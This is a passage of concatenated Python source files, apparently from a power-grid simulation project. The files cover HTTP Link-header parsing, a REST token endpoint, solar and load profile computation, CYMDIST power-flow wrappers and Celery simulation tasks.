for k in resp.request.headers:
rs["request"]["headers"][k] = resp.request.headers.get(k)
for r in resp.history:
rs["responses"].append(addHistory(r))
elapsed += rs["responses"][-1]["elapsed"]
rs["responses"].append(addHistory(resp))
elapsed += rs["responses"][-1]["elapsed"]
rs["elapsed"] = elapsed
return rs
# FROM: https://github.com/digitalbazaar/pyld/blob/master/lib/pyld/jsonld.py L337
# With adjustment to always return lists
def parseLinkHeader(header):
"""
Parses a link header. The results will be key'd by the value of "rel".
Link: <http://json-ld.org/contexts/person.jsonld>; \
rel="http://www.w3.org/ns/json-ld#context"; type="application/ld+json"
Parses as: {
'http://www.w3.org/ns/json-ld#context': [
{
target: http://json-ld.org/contexts/person.jsonld,
type: 'application/ld+json'
}
]
}
If there is more than one "rel" with the same IRI, then entries in the
resulting map for that "rel" will be lists.
:param header: the link header to parse.
:return: the parsed result.
"""
rval = {}
# split on unbracketed/unquoted commas
entries = re.findall(r'(?:<[^>]*?>|"[^"]*?"|[^,])+', header)
if not entries:
return rval
r_link_header = r'\s*<([^>]*?)>\s*(?:;\s*(.*))?'
for entry in entries:
match = re.search(r_link_header, entry)
if not match:
continue
match = match.groups()
result = {'target': match[0]}
params = match[1]
r_params = r'(.*?)=(?:(?:"([^"]*?)")|([^"]*?))\s*(?:(?:;\s*)|$)'
matches = re.findall(r_params, params)
for match in matches:
result[match[0]] = match[2] if match[1] is None else match[1]
rel = result.get('rel', '')
if isinstance(rval.get(rel), list):
rval[rel].append(result)
else:
rval[rel] = [result,]
return rval
``` |
{
"source": "Jonathan56/CyDER",
"score": 2
} |
#### File: cyder/api/views.py
```python
from rest_framework.decorators import api_view, authentication_classes, permission_classes
from rest_framework.authentication import SessionAuthentication
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
from rest_framework.authtoken.models import Token
@api_view()
@authentication_classes([SessionAuthentication])
@permission_classes([IsAuthenticated])
def token_from_session(request):
(token, _) = Token.objects.get_or_create(user=request.user)
return Response({ "token": token.key })
```
#### File: dummy_worker/sim_worker/model_simulation_days.py
```python
import sim_worker.scada as scada
import sim_worker.solarprofile as solarprofile
import pandas
import json
import re
def get_simulation_days(modelName):
"""
Args: model name as a string
Returns: a python dictionnary
keys are the feeder names
Values are pandas Series listing the corresponding two minimum net load days (values indexed by timestamp)
"""
sc=scada.Scada('C:/Users/DRRC/Desktop/raw_SCADA/'+ modelName + '.csv')
#Total PV capacity is arbitrarily chosen to be 1MW
so=solarprofile.solar_profile(sc.data.index[0],sc.data.index[-1],1000)
S1=sc.data
S2=so['GHI']
#removes index duplicates in order to perform an outer join operation on the timestamp index
S1=S1[~S1.index.duplicated()]
S2=S2[~S2.index.duplicated()]
#outer join operation on timestamp with solar values resampled by hourly mean
df = pandas.concat([S2.resample('H').mean(), S1], axis=1, join='outer')
#computes net load as NL=Load-PV
df=df.iloc[:,1:].subtract(df.iloc[:,0], axis='index')
x={}
for col in df :
temp=pandas.Series()
#computes daily minimums for given feeder
d=df[col].resample('D').min()
for idx, month in d.groupby(d.index.month):
#selects the two smallest daily net load minimums for each month
temp=temp.append(month.nsmallest(2))
#makes output json serializable
temp=temp.sort_values()
keys=temp.index.format()
values=temp.tolist()
temp=dict(zip(keys, values))
x[re.search(r"(\d+)",col).group(0)]=temp
return json.dumps(x)
```
#### File: dummy_worker/sim_worker/solarprofile.py
```python
from __future__ import division
# import matplotlib.pyplot as plt
import pandas
import datetime as dt
def solar_profile(start, end, pv_nominal_capacity_kw):
"""
Output solar generation profile based on GHI data (timestep 15 minutes)
GHI data is normalized based on 1 --> 1000 w/m2
Source: NSRDB, Location ID: 146312, Lat: 39.81, Long: 123.5, Elev: 1024
URL: https://maps.nrel.gov/nsrdb-viewer/?aL=UdPEX9%255Bv%255D%3Dt%268VW
YIh%255Bv%255D%3Dt%268VWYIh%255Bd%255D%3D1&bL=clight&cE=0&lR=0&mC=39.91
605629078665%2C-123.0084228515625&zL=9
"""
# Load data from the raw CSV file
df = pandas.read_csv('sim_worker/solar.csv', skiprows=[0, 1])
df.drop(['Relative Humidity', 'Temperature', 'Pressure'],
axis=1, inplace=True)
df['Time'] = df.apply(lambda x: dt.datetime(
x['Year'], x['Month'], x['Day'], x['Hour'], x['Minute'], 0), axis=1)
df.set_index('Time', inplace=True)
df.drop(['Year', 'Month', 'Day', 'Hour', 'Minute'], axis=1, inplace=True)
# Select data, normailize, and interpolate every 15 minutes
df = df[start:end]
df = df / 1000.0
df = df.resample('15T').interpolate('time')
# Multiply by pv nominal capacity
return df * pv_nominal_capacity_kw
# ###############################
# # HOW TO USE
# start = '2016-06-17 00:00:00'
# end = '2016-06-18 00:00:00'
# pv_nominal_capacity_kw = 60 # [kW]
# profile = solar_profile(start, end, pv_nominal_capacity_kw)
# # Plot profile
# plt.figure(figsize=(11, 5))
# plt.plot(profile)
# plt.ylabel('Active power [kW]')
# plt.show()
```
#### File: source/cymdist_tool/tool.py
```python
from __future__ import division
import pandas
import source.cymdist_tool.type_lookup as lookup
import pickle
import numpy as np
import json
try:
import cympy
except:
# Only installed on the Cymdist server
pass
def list_loads():
"""List all the loads and their demand on each phase"""
# Get a list of all the loads
devices = list_devices(device_type=14)
# Get their active power on each phase
devices['phase_0'] = [0] * len(devices)
devices['phase_1'] = [0] * len(devices)
devices['phase_2'] = [0] * len(devices)
devices['activepower_0'] = [0] * len(devices)
devices['activepower_1'] = [0] * len(devices)
devices['activepower_2'] = [0] * len(devices)
for value in devices.itertuples():
for index in [0, 1, 2]:
try:
devices.loc[value.Index, 'activepower_' + str(index)] = cympy.study.GetValueDevice(
'CustomerLoads[0].CustomerLoadModels[0].CustomerLoadValues[' + str(index) + '].LoadValue.KW',
value.device_number, int(value.device_type_id))
except:
devices.loc[value.Index, 'activepower_' + str(index)] = False
try:
devices.loc[value.Index, 'phase_' + str(index)] = cympy.study.GetValueDevice(
'CustomerLoads[0].CustomerLoadModels[0].CustomerLoadValues[' + str(index) + '].Phase',
value.device_number, int(value.device_type_id))
except:
devices.loc[value.Index, 'phase_' + str(index)] = False
return devices
def list_pvs():
"""List all the PVs and their demand"""
# Get a list of all the loads
devices = list_devices(device_type=39)
# Get their generation on each phase
devices['generation'] = [0] * len(devices)
for value in devices.itertuples():
# Get the according voltage per phase in a pandas dataframe
devices.loc[value.Index, 'generation'] = cympy.study.QueryInfoDevice(
'PVActiveGeneration', value.device_number, int(value.device_type_id))
# Cast the right type
for column in ['generation']:
devices[column] = devices[column].apply(lambda x: 0 if x is '' else float(x))
return devices
def list_devices(device_type=False, verbose=False):
"""List all devices and return a break down of their type
Args:
device_type (Device): if passed then list of device with the same type
verbose (Boolean): if True print result (default True)
Return:
DataFrame <device, device_type, device_number, device_type_id>
"""
# Get the list of devices
if device_type:
devices = cympy.study.ListDevices(device_type)
else:
# Get all devices
devices = cympy.study.ListDevices()
# Create a dataframe
devices = pandas.DataFrame(devices, columns=['device'])
devices['device_type_id'] = devices['device'].apply(lambda x: x.DeviceType)
devices['device_number'] = devices['device'].apply(lambda x: x.DeviceNumber)
devices['device_type'] = devices['device_type_id'].apply(lambda x: lookup.type_table[x])
# Get the break down of each type
if verbose:
unique_type = devices['device_type'].unique().tolist()
for device_type in unique_type:
print('There are ' + str(devices[devices.device_type == device_type].count()[0]) +
' ' + device_type)
return devices
def list_nodes():
"""List all the nodes
Return:
a DataFrame with section_id, node_id, latitude and longitude
"""
# Get all nodes
nodes = cympy.study.ListNodes()
# Create a frame
nodes = pandas.DataFrame(nodes, columns=['node_object'])
nodes['node_id'] = nodes['node_object'].apply(lambda x: x.ID)
nodes['section_id'] = [0] * len(nodes)
nodes['latitude'] = [0] * len(nodes)
nodes['longitude'] = [0] * len(nodes)
nodes['distance'] = [0] * len(nodes)
for node in nodes.itertuples():
nodes.loc[node.Index, 'section_id'] = cympy.study.QueryInfoNode("SectionId", node.node_id)
nodes.loc[node.Index, 'latitude'] = cympy.study.QueryInfoNode("CoordY", node.node_id)
nodes.loc[node.Index, 'longitude'] = cympy.study.QueryInfoNode("CoordX", node.node_id)
nodes.loc[node.Index, 'distance'] = cympy.study.QueryInfoNode("Distance", node.node_id)
# Cast the right type
for column in ['latitude']:
nodes[column] = nodes[column].apply(lambda x: None if x is '' else float(x) / (1.26 * 100000))
# Cast the right type
for column in ['longitude']:
nodes[column] = nodes[column].apply(lambda x: None if x is '' else float(x) / (100000))
# Cast the right type
for column in ['distance']:
nodes[column] = nodes[column].apply(lambda x: None if x is '' else float(x))
return nodes
def _describe_object(device):
for value in cympy.dm.Describe(device.GetObjType()):
print(value.Name)
def get_device(id, device_type, verbose=False):
"""Return a device
Args:
id (String): unique identifier
device_type (DeviceType): type of device
verbose (Boolean): describe an object
Return:
Device (Device)
"""
# Get object
device = cympy.study.GetDevice(id, device_type)
# Describe attributes
if verbose:
_describe_object(device)
return device
def add_device(device_name, device_type, section_id):
"""Return a device
Args:
device_name (String): unique identifier
device_type (DeviceType): type of device
section_id (String): unique identifier
Return:
Device (Device)
"""
return cympy.study.AddDevice(device_name, device_type, section_id)
def add_pv(device_name, section_id, ns=100, np=100, location="To"):
"""Return a device
Args:
device_name (String): unique identifier
section_id (String): unique identifier
ns (Int): number of pannel in serie (* 17.3 to find voltage)
np (Int): number of pannel in parallel (ns * np * 0.08 to find kW)
location (String): To or From
Return:
Device (Device)
"""
my_pv = add_device(device_name, cympy.enums.DeviceType.Photovoltaic, section_id)
my_pv.SetValue(location, "Location")
return my_pv
def load_allocation(values):
"""Run a load allocation
Args:
values (dictionnary): value1 (KVA) and value2 (PF) for A, B and C
"""
# Create Load Allocation object
la = cympy.sim.LoadAllocation()
# Create the Demand object
demand = cympy.sim.Meter()
# Fill in the demand values
demand.IsTotalDemand = False
demand.DemandA = cympy.sim.LoadValue()
demand.DemandA.Value1 = values['P_A']
demand.DemandA.Value2 = values['Q_A']
demand.DemandB = cympy.sim.LoadValue()
demand.DemandB.Value1 = values['P_B']
demand.DemandB.Value2 = values['Q_B']
demand.DemandC = cympy.sim.LoadValue()
demand.DemandC.Value1 = values['P_C']
demand.DemandC.Value2 = values['Q_C']
demand.LoadValueType = cympy.enums.LoadValueType.KW_KVAR
# Get a list of networks
networks = cympy.study.ListNetworks()
# Set the first feeders demand
la.SetDemand(networks[0], demand)
# Set up the right voltage [V to kV]
cympy.study.SetValueTopo(values['VMAG_A'] / 1000,
"Sources[0].EquivalentSourceModels[0].EquivalentSource.OperatingVoltage1", networks[0])
cympy.study.SetValueTopo(values['VMAG_B'] / 1000,
"Sources[0].EquivalentSourceModels[0].EquivalentSource.OperatingVoltage2", networks[0])
cympy.study.SetValueTopo(values['VMAG_C'] / 1000,
"Sources[0].EquivalentSourceModels[0].EquivalentSource.OperatingVoltage3", networks[0])
# Run the load allocation
la.Run([networks[0]])
def get_voltage(frame, is_node=False):
"""
Args:
devices (DataFrame): list of all the devices or nodes to include
Return:
devices_voltage (DataFrame): devices and their corresponding voltage for
each phase
"""
# Create a new frame to hold the results
voltage = frame.copy()
# Reset or create new columns to hold the result
voltage['voltage_A'] = [0] * len(voltage)
voltage['voltage_B'] = [0] * len(voltage)
voltage['voltage_C'] = [0] * len(voltage)
for value in frame.itertuples():
if not is_node:
# Get the according voltage per phase in a pandas dataframe
voltage.loc[value.Index, 'voltage_A'] = cympy.study.QueryInfoDevice(
"VpuA", value.device_number, int(value.device_type_id))
voltage.loc[value.Index, 'voltage_B'] = cympy.study.QueryInfoDevice(
"VpuB", value.device_number, int(value.device_type_id))
voltage.loc[value.Index, 'voltage_C'] = cympy.study.QueryInfoDevice(
"VpuC", value.device_number, int(value.device_type_id))
else:
# Get the according voltage per phase in a pandas dataframe
voltage.loc[value.Index, 'voltage_A'] = cympy.study.QueryInfoNode("VpuA", value.node_id)
voltage.loc[value.Index, 'voltage_B'] = cympy.study.QueryInfoNode("VpuB", value.node_id)
voltage.loc[value.Index, 'voltage_C'] = cympy.study.QueryInfoNode("VpuC", value.node_id)
# Cast the right type
for column in ['voltage_A', 'voltage_B', 'voltage_C']:
voltage[column] = voltage[column].apply(lambda x: None if x is '' else float(x))
return voltage
def get_overload(devices):
"""
Args:
devices (DataFrame): list of all the devices to include
first_n_devices (Int): number of row to return
Return:
overload_device (DataFrame): return the n devices with the highest load
"""
# Create a new frame to hold the results
overload = devices.copy()
# Reset or create new columns to hold the result
overload['overload_A'] = [0] * len(overload)
overload['overload_B'] = [0] * len(overload)
overload['overload_C'] = [0] * len(overload)
for device in devices.itertuples():
# Get the according overload per phase in a pandas dataframe
overload.loc[device.Index, 'overload_A'] = cympy.study.QueryInfoDevice(
"OverloadAmpsA", device.device_number, int(device.device_type_id))
overload.loc[device.Index, 'overload_B'] = cympy.study.QueryInfoDevice(
"OverloadAmpsB", device.device_number, int(device.device_type_id))
overload.loc[device.Index, 'overload_C'] = cympy.study.QueryInfoDevice(
"OverloadAmpsC", device.device_number, int(device.device_type_id))
# Cast the right type
for column in ['overload_A', 'overload_B', 'overload_C']:
overload[column] = overload[column].apply(lambda x: None if x is '' else float(x))
return overload
def get_load(devices):
"""
Args:
devices (DataFrame): list of all the devices to include
Return:
devices_voltage (DataFrame): devices and their corresponding load for
each phase
"""
# Create a new frame to hold the results
load = devices.copy()
# Reset or create new columns to hold the result
load['MWA'] = [0] * len(load)
load['MWB'] = [0] * len(load)
load['MWC'] = [0] * len(load)
load['MWTOT'] = [0] * len(load)
load['MVARA'] = [0] * len(load)
load['MVARB'] = [0] * len(load)
load['MVARC'] = [0] * len(load)
load['MVARTOT'] = [0] * len(load)
for device in devices.itertuples():
# Get the according load per phase in a pandas dataframe
load.loc[device.Index, 'MWA'] = cympy.study.QueryInfoDevice(
"MWA", device.device_number, int(device.device_type_id))
load.loc[device.Index, 'MWB'] = cympy.study.QueryInfoDevice(
"MWB", device.device_number, int(device.device_type_id))
load.loc[device.Index, 'MWC'] = cympy.study.QueryInfoDevice(
"MWC", device.device_number, int(device.device_type_id))
load.loc[device.Index, 'MWTOT'] = cympy.study.QueryInfoDevice(
"MWTOT", device.device_number, int(device.device_type_id))
load.loc[device.Index, 'MVARA'] = cympy.study.QueryInfoDevice(
"MVARA", device.device_number, int(device.device_type_id))
load.loc[device.Index, 'MVARB'] = cympy.study.QueryInfoDevice(
"MVARB", device.device_number, int(device.device_type_id))
load.loc[device.Index, 'MVARC'] = cympy.study.QueryInfoDevice(
"MVARC", device.device_number, int(device.device_type_id))
load.loc[device.Index, 'MVARTOT'] = cympy.study.QueryInfoDevice(
"MVARTOT", device.device_number, int(device.device_type_id))
# Cast the right type
for column in ['MWA', 'MWB', 'MWC', 'MWTOT', 'MVARA', 'MVARB', 'MVARC', 'MVARTOT']:
load[column] = load[column].apply(lambda x: None if x is '' else float(x))
return load
def get_distance(devices):
"""
Args:
devices (DataFrame): list of all the devices to include
Return:
devices_distance (DataFrame): devices and their corresponding distance from the substation
"""
distance = devices.copy()
# Reset or create new columns to hold the result
distance['distance'] = [0] * len(distance)
for device in devices.itertuples():
# Get the according distance in a pandas dataframe
distance.loc[device.Index, 'distance'] = cympy.study.QueryInfoDevice(
"Distance", device.device_number, int(device.device_type_id))
# Cast the right type
for column in ['distance']:
distance[column] = distance[column].apply(lambda x: None if x is '' else float(x))
return distance
def get_coordinates(devices):
"""
Args:
devices (DataFrame): list of all the devices to include
Return:
devices_distance (DataFrame): devices and their corresponding latitude
and longitude from the substation
"""
coordinates = devices.copy()
# Reset or create new columns to hold the result
coordinates['latitude'] = [0] * len(coordinates)
coordinates['longitude'] = [0] * len(coordinates)
coordinates['section_id'] = [0] * len(coordinates)
for device in devices.itertuples():
# Get the according latitude in a pandas dataframe
coordinates.loc[device.Index, 'latitude'] = cympy.study.QueryInfoDevice(
"CoordY", device.device_number, int(device.device_type_id))
# Get the according longitude in a pandas dataframe
coordinates.loc[device.Index, 'longitude'] = cympy.study.QueryInfoDevice(
"CoordX", device.device_number, int(device.device_type_id))
# Get the section id in a pandas dataframe
coordinates.loc[device.Index, 'section_id'] = cympy.study.QueryInfoDevice(
"SectionId", device.device_number, int(device.device_type_id))
# Cast the right type
for column in ['latitude']:
coordinates[column] = coordinates[column].apply(lambda x: None if x is '' else float(x) / (1.26 * 100000))
# Cast the right type
for column in ['longitude']:
coordinates[column] = coordinates[column].apply(lambda x: None if x is '' else float(x) / (100000))
return coordinates
def get_unbalanced_line(devices):
"""This function requires the get_voltage function has been called before.
Args:
devices (DataFrame): list of all the devices to include
first_n_devices (Int): number of row to return
Return:
overload_device (DataFrame): return the n devices with the highest load
"""
# Get all the voltage
voltage = get_voltage(devices)
# Get the mean voltage accross phase
voltage['mean_voltage_ABC'] = voltage[['voltage_A', 'voltage_B', 'voltage_C']].mean(axis=1)
# Get the max difference of the three phase voltage with the mean
def _diff(value):
diff = []
for phase in ['voltage_A', 'voltage_B', 'voltage_C']:
diff.append(abs(value[phase] - value['mean_voltage_ABC']) * 100 / value['mean_voltage_ABC'])
return max(diff)
voltage['diff_with_mean'] = voltage[['mean_voltage_ABC', 'voltage_A', 'voltage_B', 'voltage_C']].apply(_diff, axis=1)
return voltage
```
#### File: source/load_forecast/tool.py
```python
from __future__ import division
import source.cymdist_tool.tool as cymdist
import datetime
import pandas
try:
import cympy
except:
pass
class LoadForecast(object):
"""Forecast EV demand at a feeder"""
def __init__(self):
self.configuration = None
self.feeder = None
self.configuration = None
def initialize(self, feeder):
"""Initialize feeder inputs"""
self.feeder = feeder
self.configuration = feeder.configuration
def forecast(self):
"""Forecast load demand and return configuration file for CyDER"""
# Save normalized generation with the right format
load_forecast = self._load_forecast()
# Update the configuration file
self._update_configuration(load_forecast)
return load_forecast, self.configuration
def _update_configuration(self, load_forecast):
"""Update all pvs within feeder with the pv_forecast timeserie"""
# Open model and get the devices from the first model
cympy.study.Open(self.feeder.feeder_folder + self.feeder.feeder_name)
loads = cymdist.list_loads()
# GET FIRST TIME PV FORECAST <----
start = datetime.datetime(2014, 2, 1, 6, 0, 0)
for index, time in enumerate(self.configuration['times']):
dt = start + datetime.timedelta(seconds=time)
for load in loads.iterrows():
_, load = load
self.configuration['models'][index]['set_loads'].append(
{'device_number': load['device_number'],
'active_power': [],
'description': 'load forecast'})
for phase_index in ['0', '1', '2']:
if load['activepower_' + phase_index]:
self.configuration['models'][index]['set_loads'][-1]['active_power'].append(
{'active_power': (float(load['activepower_' + phase_index])
* load_forecast.loc[dt, 'profile']),
'phase_index': phase_index,
'phase': str(load['phase_' + phase_index])})
def _load_forecast(self):
"""Load forecast from static file directly"""
# Load prediction from file
return pandas.read_csv(
'static/load/profile.csv', index_col=0, parse_dates=[0])
```
#### File: static/fmus/cymdist_wrapper.py
```python
import json
try:
import cympy
except:
# Only installed on the Cymdist server
pass
def cymdist(configuration_filename, time, input_voltage_names,
input_voltage_values, output_names, input_save_to_file):
"""Communicate with the FMU to launch a Cymdist simulation
Args:
configuration_filename (String): filename for the model configurations
time (Float): Simulation time
input_voltage_names (Strings): voltage vector names
input_voltage_values (Floats): voltage vector values (same length as voltage_names)
output_names (Strings): vector of name matching CymDIST nomenclature
input_save_to_file (1 or 0): save all nodes results to a file
Example:
>>> time = 0
>>> input_save_to_file = 0
>>> input_voltage_names = ['VMAG_A', 'VMAG_B', 'VMAG_C', 'VANG_A', 'VANG_B', 'VANG_C']
>>> input_voltage_values = [2520, 2520, 2520, 0, -120, 120]
>>> configuration_filename = 'config.json'
>>> output_names = ['IA', 'IAngleA', 'IB', 'IAngleB', 'IC', 'IAngleC']
>>> cymdist(configuration_filename, time, input_voltage_names,
input_voltage_values, output_names, input_save_to_file)
Note:
config.json file format:
{times: [0]
interpolation_method: 'closest_time',
models: [{
filename: 'my_model.sxst',
new_loads: [{
section_id: '',
active_power: '',
}],
new_pvs: [{
section_id: '',
generation: '',
}],
set_pvs: [{
device_number: '',
generation: '',
}],
set_loads: [{
device_number: '',
active_power: [{
active_power: '',
phase_index: '',
phase: c,
}],
}],
}]
}
(time vector must have a 1:1 relationship with the model vector)
output_names can be: ['KWA', 'KWB', 'KWC', 'KVARA', 'KVARB', 'KVARC',
'IA', 'IAngleA', 'IB', 'IAngleB', 'IC', 'IAngleC', 'PFA', 'PFB', 'PFC']
for a greater list see CymDIST > customize > keywords > powerflow
(output unit is directly given by output name)
"""
def _input_voltages(input_voltage_names, input_voltage_values):
"""Create a dictionary from the input values and input names for voltages"""
voltages = {}
for name, value in zip(input_voltage_names, input_voltage_values):
voltages[name] = value
return voltages
def _read_configuration_file(configuration_filename, current_time):
"""This function open the configuration file and pick the right model given
a simulation time.
"""
def _closest_time(current_time, times):
"""Find the closest time, return model index"""
distances = [abs(value - current_time) for value in times]
min_value, min_index = min((value, index) for index, value in enumerate(distances))
return min_index
# Open the configuration file and read the configurations
with open(configuration_filename, 'r') as configuration_file:
configuration = json.load(configuration_file)
# Select the appropriate model
model = configuration['models'][_closest_time(current_time, configuration['times'])]
return model
def _set_voltages(voltages, networks):
"""Set the voltage at the source node"""
# Set up the right voltage in kV (input must be V)
cympy.study.SetValueTopo(voltages['VMAG_A'] / 1000,
"Sources[0].EquivalentSourceModels[0].EquivalentSource.OperatingVoltage1", networks[0])
cympy.study.SetValueTopo(voltages['VMAG_B'] / 1000,
"Sources[0].EquivalentSourceModels[0].EquivalentSource.OperatingVoltage2", networks[0])
cympy.study.SetValueTopo(voltages['VMAG_C'] / 1000,
"Sources[0].EquivalentSourceModels[0].EquivalentSource.OperatingVoltage3", networks[0])
return True
def _add_loads(loads):
for index, load in enumerate(loads):
# Add load and overwrite (load demand need to be sum of previous load and new)
temp_load_model = cympy.study.AddDevice(
"MY_LOAD_" + str(index), 14, load['section_id'], 'DEFAULT',
cympy.enums.Location.FirstAvailable , True)
# Set power demand
phases = list(cympy.study.QueryInfoDevice("Phase", "MY_LOAD_" + str(index), 14))
power = load['active_power'] / len(phases)
for phase in range(0, len(phases)):
cympy.study.SetValueDevice(
power,
'CustomerLoads[0].CustomerLoadModels[0].CustomerLoadValues[' + str(phase) + '].LoadValue.KW',
"MY_LOAD_" + str(index), 14)
# Note: customer is still 0 as well as energy values, does it matters?
return True
def _set_loads(loads):
for index, load in enumerate(loads):
for phase in load['active_power']:
cympy.study.SetValueDevice(phase['active_power'],
'CustomerLoads[0].CustomerLoadModels[0].CustomerLoadValues[' + str(phase['phase_index']) + '].LoadValue.KW',
load['device_number'], 14)
return True
def _add_pvs(pvs):
"""Add new pvs on the grid"""
for index, pv in enumerate(pvs):
# Add PVs
device = cympy.study.AddDevice("my_pv_" + str(index), cympy.enums.DeviceType.Photovoltaic, pv['section_id'])
# Set PV size (add + 30 to make sure rated power is above generated power)
device.SetValue(int((pv['generation'] + 30) / (23 * 0.08)), "Np") # (ns=23 * np * 0.08 to find kW) --> kw / (23 * 0.08)
device.SetValue(pv['generation'], 'GenerationModels[0].ActiveGeneration')
# Set inverter size
device.SetValue(pv['generation'], "Inverter.ConverterRating")
device.SetValue(pv['generation'], "Inverter.ActivePowerRating")
device.SetValue(pv['generation'], "Inverter.ReactivePowerRating")
return True
def _set_pvs(pvs):
for index, pv in enumerate(pvs):
cympy.study.SetValueDevice(int((pv['generation'] + 30) / (23 * 0.08)), 'Np',
pv['device_number'], 39)
cympy.study.SetValueDevice(pv['generation'], 'GenerationModels[0].ActiveGeneration',
pv['device_number'], 39)
cympy.study.SetValueDevice(pv['generation'], 'Inverter.ConverterRating',
pv['device_number'], 39)
cympy.study.SetValueDevice(pv['generation'], 'Inverter.ActivePowerRating',
pv['device_number'], 39)
cympy.study.SetValueDevice(pv['generation'], 'Inverter.ReactivePowerRating',
pv['device_number'], 39)
return True
def _write_results(source_node_id, output_filename):
"""Write result to the file system"""
# Get results
result = {}
keys = ['DwLowVoltWorstA', 'DwLowVoltWorstB', 'DwLowVoltWorstC',
'DwHighVoltWorstA', 'DwHighVoltWorstB', 'DwHighVoltWorstC']
for key in keys:
result[key] = cympy.study.QueryInfoNode(key, str(source_node_id))
# Save results
with open(output_filename, 'w') as f:
json.dump(result, f)
def _output_values(source_node_id, output_names):
"""Query the right output name at the source node"""
output = []
for category in output_names:
temp = cympy.study.QueryInfoNode(category, source_node_id)
output.append(float(temp) * 1.0)
return output
# Process input and check for validity
voltages = _input_voltages(input_voltage_names, input_voltage_values)
if input_save_to_file in [1, 1.0, '1']:
input_save_to_file = True
else:
input_save_to_file = False
model = _read_configuration_file(configuration_filename, time)
# Open the model
cympy.study.Open(model['filename'])
# Set voltages
networks = cympy.study.ListNetworks()
_set_voltages(voltages, networks)
# Set loads
if model['set_loads']:
_set_loads(model['set_loads'])
# Add loads
if model['new_loads']:
_add_loads(model['new_loads'])
# Set loads
if model['set_pvs']:
_set_pvs(model['set_pvs'])
# Add PV
if model['new_pvs']:
_add_pvs(model['new_pvs'])
# Run the power flow
lf = cympy.sim.LoadFlow()
lf.Run()
# Return the right values
source_node_id = cympy.study.GetValueTopo("Sources[0].SourceNodeID", networks[0])
output = _output_values(source_node_id, output_names)
# Write results?
if model['save'] not in 'False':
_write_results(source_node_id, model['save'])
return output
```
#### File: worker/sim_worker/tasks.py
```python
from .celery import app
import os
import json
import shutil
import datetime
import random
import math
import pandas
import dateutil.parser
import re
def drop_column(table, column):
for row in table:
del row[column]
@app.task
def get_model(modelname):
# Import cympy from the function to prevent multiple import caused by celery importing this module at launch
from . import cymdist
cymdist.open_study(modelname + '.sxst')
cymdist.compute_loadflow()
model = cymdist.model_info(modelname)
devices = cymdist.list_devices()
cymdist.get_devices_details(devices)
nodes = cymdist.list_nodes()
cymdist.get_voltages(nodes)
sections = cymdist.list_sections()
# Remove cympy objects to be able to serialize
drop_column(devices, 'device_object')
drop_column(nodes, 'node_object')
drop_column(sections, 'section_object')
# Return result and exit the worker to "free" cympy
app.backend.mark_as_done(get_model.request.id, (model, nodes,sections,devices))
exit(0)
@app.task
def run_configuration(id, project):
# run_configuration will exploit the solar.csv sunlight data aswell as the scada baseload data through the solarprofile.py and scadaprofile.py modules
# run_configuration returns the estimated PV production in time and estimated load in time
import sim_worker.pv
# import sim_worker.substation
import sim_worker.scada
import sim_worker.scadaprofile as scp
import sim_worker.solarprofile as sop
simDays = project['simulation_dates']
l=[]
for key in simDays:
l.append(min(simDays[key].items(), key=lambda x: x[1]))
day=min(l,key=lambda x: x[1])[0]
start=day + ' 07:00:00'
end=day + ' 18:00:00'
substation = project['model']
add_pv = pandas.DataFrame.from_dict(project['addPv'])
if (add_pv.empty):
pv=[]
pvIndex=[]
else :
pv_nominal_capacity_kw = add_pv['power'].sum()
pv = sop.solar_profile(start, end, pv_nominal_capacity_kw)
pvIndex=pv.index.strftime('%Y-%m-%d %H:%M:%S').tolist()
pv = pv.iloc[:,0].tolist()
load = scp.scada_profile(start, end, substation)
loadIndex = load.to_frame().index.strftime('%Y-%m-%d %H:%M:%S').tolist()
load=load.tolist()
ev = []
return { 'pv': pv, 'pvIndex': pvIndex, 'ev': ev, 'load': load, 'loadIndex': loadIndex, 'date': day }
@app.task
def run_detailed_configuration(id, project):
# run_configuration will exploit the solar.csv sunlight data aswell as the scada baseload data through the solarprofile.py and scadaprofile.py modules
# run_configuration returns the estimated PV production in time and estimated load in time
import sim_worker.pv
# import sim_worker.substation
import sim_worker.scada
import sim_worker.scadaprofile as scp
import sim_worker.solarprofile as sop
simDays = project['simulation_dates']
x=pandas.Series()
for key in simDays:
x=x.append(pandas.Series(list(simDays[key].keys())))
x=x.drop_duplicates().sort_values()
result={}
for day in x:
start=day + ' 07:00:00'
end=day + ' 18:00:00'
substation = project['model']
add_pv = pandas.DataFrame.from_dict(project['addPv'])
if (add_pv.empty):
pv=[]
pvIndex=[]
else :
pv_nominal_capacity_kw = add_pv['power'].sum()
pv = sop.solar_profile(start, end, pv_nominal_capacity_kw)
pvIndex=pv.index.strftime('%Y-%m-%d %H:%M:%S').tolist()
pv = pv.iloc[:,0].tolist()
load = scp.scada_profile(start, end, substation)
loadIndex = load.to_frame().index.strftime('%Y-%m-%d %H:%M:%S').tolist()
load=load.tolist()
ev = []
temp={}
temp['pv']=pv
temp['pvIndex']=pvIndex
temp['ev']=ev
temp['load']=load
temp['loadIndex']=loadIndex
temp['date']=day
result[day]=temp
return result
@app.task
def run_simulation(id, project, day):
# run_simulation prepares and formats the data from the project settings and launches the simulation through the cymdist python api
# run_simulation returns in json format the simulation results that will be saved in the results field of the project
from . import cymdist
from sim_worker.pv import PVFactory
from sim_worker.substation import Substation
from sim_worker.scada import Scada
pv_node_ids = []
pv_network_ids = []
pv_device_ids = []
pv_nominal_capacities = []
load_node_ids = []
load_network_ids = []
load_device_ids = []
load_nominal_capacities = []
substation = Substation('C:/Users/DRRC/Desktop/PGE_Models_DO_NOT_SHARE/' + project['model'] + '.sxst')
i=0
for p in project['addPv']:
pv_node_ids.append(p['node_id'])
pv_network_ids.append(p['feeder'])
pv_nominal_capacities.append(-1*p['power'])
pv_device_ids.append('PV' + str(i) )
i=i+1
# assuming load_nominal capacities is equivalent to the opposite of pv_nominal_capacities
i=0
for p in project['addLoad']:
load_node_ids.append(p['node_id'])
load_network_ids.append(p['feeder'])
load_nominal_capacities.append(p['power'])
load_device_ids.append('Load' + str(i) )
i=i+1
substation.add_power_devices(node_ids=pv_node_ids, network_ids=pv_network_ids, device_ids=pv_device_ids)
pvfactory = PVFactory('sim_worker/solar.csv')
pvs = pvfactory.create(pv_nominal_capacities, pv_device_ids)
scada = Scada('C:/Users/DRRC/Desktop/raw_SCADA/' + project['model'] + '.csv')
# simDays = project['simulation_dates']
# l=[]
# for key in simDays:
# l.append(min(simDays[key].items(), key=lambda x: x[1]))
# day=min(l,key=lambda x: x[1])[0]
start=day + ' 07:00:00'
end=day + ' 18:00:00'
timestep = '60T'
datetimes = pandas.date_range(start, end, freq= timestep).tolist()
results = []
